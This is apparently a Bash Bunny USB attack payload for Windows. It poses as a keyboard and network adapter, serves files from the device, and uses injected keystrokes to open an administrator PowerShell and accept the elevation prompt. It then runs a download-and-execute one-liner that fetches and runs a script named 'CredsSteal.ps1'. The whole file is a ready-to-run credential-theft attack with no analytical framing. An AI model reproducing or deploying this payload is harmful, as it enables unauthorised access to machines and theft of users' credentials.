# Title: 
# Author: 
# Version: 1.0
# Target: Windows
#
# 
# Green .........Power On
# White .........Started
# White Blinking......... Running
# Purple.................Finished
################################################

LED SETUP
ATTACKMODE HID RNDIS_ETHERNET

GET HOST_IP
GET SWITCH_POSITION
PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}

iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
/usr/bin/gohttp -p 80 -d /tmp/ &
cp -R ${PAYLOAD_DIR}/* /tmp/ #move payloads to tmp
ATTACKMODE STORAGE
LED STAGE1

# start an admin powershell
RUN WIN powershell.exe start powershell -verb runas
Q ENTER
Q DELAY 3000
Q LEFTARROW
Q ENTER
Q DELAY 3000

#Download and execute from the bunny
Q STRING iex\(new-object net.webclient\).downloadstring\(\'http://${HOST_IP}/CredsSteal.ps1\'\)
Q DELAY 20
Q ENTER

LED FINISH
